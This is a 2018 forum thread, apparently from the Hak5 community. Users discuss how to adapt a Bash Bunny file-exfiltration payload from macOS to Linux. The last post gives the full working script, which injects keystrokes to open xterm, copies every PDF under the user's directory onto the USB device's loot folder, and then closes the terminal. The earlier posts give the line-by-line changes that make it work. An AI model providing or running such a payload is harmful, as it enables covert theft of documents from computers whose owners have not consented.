Am3ience Posted February 28, 2018 Share Posted February 28, 2018 Hey guys, So there are a bunch of file exfiltration payloads for Windows on the git, but does anyone know of one for Linux? I'm trying to see if I can exfil all .docx or .pdf from a folder on linux to the Bash Bunny. Any help would be great, thanks! Link to comment Share on other sites More sharing options...
C1PH3R Posted March 1, 2018 Share Posted March 1, 2018 On 2/28/2018 at 7:29 AM, Am3ience said: Hey guys, So there are a bunch of file exfiltration payloads for Windows on the git, but does anyone know of one for Linux? I'm trying to see if I can exfil all .docx or .pdf from a folder on linux to the Bash Bunny. Any help would be great, thanks! Most mac payloads will work because mac uses unix. So try to use a couple of those, maybe edit one or more lines and you will be set! Link to comment Share on other sites More sharing options...
Am3ience Posted March 2, 2018 Author Share Posted March 2, 2018 9 hours ago, C1PH3R said: Most mac payloads will work because mac uses unix. So try to use a couple of those, maybe edit one or more lines and you will be set! I'm looking at this really simple payload, https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/MacPDFExfil What kind of things would i need to change for this to work for Linux? Link to comment Share on other sites More sharing options...
C1PH3R Posted March 2, 2018 Share Posted March 2, 2018 7 hours ago, Am3ience said: I'm looking at this really simple payload, https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/MacPDFExfil What kind of things would i need to change for this to work for Linux? I will try to help, but note that I have not tested this yet You will probably need to change: line 19: QUACK CONTROL ALT t That should work if it doesn't try to run the commands yourself and see what the error messages are. Link to comment Share on other sites More sharing options...
bg-wa Posted March 2, 2018 Share Posted March 2, 2018 Like @C1PH3R said, I'd probably replace Lines 19-22 with: RUN UNITY xterm (for some reason I've had better luck executing commands in xterm than with terminal in Unity) and you'll also need to change your loot_dir to something like: /media/$USER/BashBunny/loot/XYZ then obviously 'killall xterm' instead of terminal. ** Also untested Link to comment Share on other sites More sharing options...
C1PH3R Posted March 3, 2018 Share Posted March 3, 2018 12 hours ago, bg-wa said: Like @C1PH3R said, I'd probably replace Lines 19-22 with: RUN UNITY xterm (for some reason I've had better luck executing commands in xterm than with terminal in Unity) and you'll also need to change your loot_dir to something like: /media/$USER/BashBunny/loot/XYZ then obviously 'killall xterm' instead of terminal. ** Also untested Yeah, this could probably work! Link to comment Share on other sites More sharing options...
Am3ience Posted March 4, 2018 Author Share Posted March 4, 2018 Thanks guys! Managed to figure it out with your help. For future reference if anyone else stumbles upon this thread, below is the code to exfil PDFs from Fedora, but should work in all Linux distros. LED SETUP ATTACKMODE HID STORAGE LED ATTACK RUN UNITY xterm Q DELAY 1000 Q STRING export lootdir=/run/media/\$USER/BashBunny/loot/LinuxGrabber Q ENTER Q STRING mkdir -p \$lootdir Q ENTER # Find all PDFs stored in the user's file structure, and copy them over to the BashBunny storage. Q STRING find . -name "*.pdf" -exec cp '{}' \$lootdir \\\; Q ENTER Q STRING killall xterm Q ENTER # sync the filesystem sync LED FINISH Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.